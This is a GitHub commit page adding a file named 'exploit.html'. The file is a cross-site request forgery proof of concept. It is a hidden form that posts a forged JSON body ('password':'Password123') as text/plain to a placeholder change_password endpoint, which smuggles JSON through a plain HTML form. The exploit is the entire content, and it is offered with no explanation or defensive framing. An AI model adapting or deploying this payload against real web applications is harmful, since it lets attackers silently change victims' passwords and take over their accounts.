Skip to content

Commit

Permalink
Create exploit.html
Browse files Browse the repository at this point in the history
  • Loading branch information
0xLittleSpidy authored Feb 18, 2024
1 parent f8ff145 commit 111ca0e
Showing 1 changed file with 17 additions and 0 deletions.
17 changes: 17 additions & 0 deletions exploit.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>Exploit</title>
</head>

<body>
<h1> Exploit </h1>
<form id="csrf" action="http://example/change_password" method="POST" enctype="text/plain" >
<input type="hidden" name='{"password":"Password123' value='"}' >
</form>
</body>

</html>

0 comments on commit 111ca0e

Please sign in to comment.